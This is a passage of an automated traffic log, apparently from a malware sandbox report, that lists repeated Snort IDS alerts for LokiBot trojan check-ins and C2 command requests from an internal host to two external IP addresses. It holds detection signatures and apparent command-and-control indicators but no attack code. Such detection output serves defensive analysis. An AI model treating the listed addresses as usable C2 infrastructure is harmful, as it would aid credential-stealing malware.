Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49805 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49806 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49806 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49806 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49806 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49807 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49807 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49807 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49807 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49808 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49808 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49808 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49808 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49810 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49810 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49810 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49810 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49811 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49811 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49811 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49811 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49812 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49812 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49812 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49812 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49813 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49813 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49813 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49813 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49814 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49814 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49814 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49814 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49815 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49815 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49815 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49815 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49816 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49816 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49816 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49816 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49817 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49817 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49817 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49817 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49820 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49820 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49820 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49820 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49826 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49826 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49826 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49826 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49834 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49834 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49834 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49834 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49843 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49843 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49843 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49843 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49853 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49853 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49853 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49853 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49860 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49860 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49860 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49860 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49863 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49863 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49863 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49863 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49864 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49864 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49864 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49864 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49870 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49870 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49870 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49870 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49871 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49871 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49871 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49871 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49872 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49872 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49872 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49872 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49873 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49873 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49873 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49873 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49875 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49875 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49875 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49875 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49876 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49876 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49876 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49876 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49878 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49878 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49878 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49878 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49883 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49883 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49883 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49883 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49890 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49890 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49890 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49890 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49897 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49897 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49897 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49897 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49905 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49905 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49905 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49905 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49910 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49910 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49910 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49910 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49911 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49911 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49911 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49911 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49912 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49912 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49912 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49912 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49913 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49913 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49913 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49913 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49914 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49914 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49914 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49914 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49915 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49915 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49915 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49915 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49916 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49916 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49916 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49916 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49918 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49918 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49918 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49918 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49921 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49921 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49921 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49921 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49923 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49923 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49923 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49923 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49924 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49924 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49924 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49924 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49925 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49925 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49925 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49925 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49926 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49926 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49926 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49926 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49927 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49927 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49927 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49927 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49928 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49928 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49928 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49928 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49929 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49929 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49929 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49929 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49930 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49930 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49930 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49930 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49931 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49931 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49931 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49931 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49932 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49932 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49932 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49932 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49933 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49933 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49933 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49933 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49934 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49934 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49934 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49934 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49935 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49935 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49935 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49935 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49936 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49936 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49936 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49936 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49937 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49937 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49937 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49937 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49938 -> 172.67.219.104:80
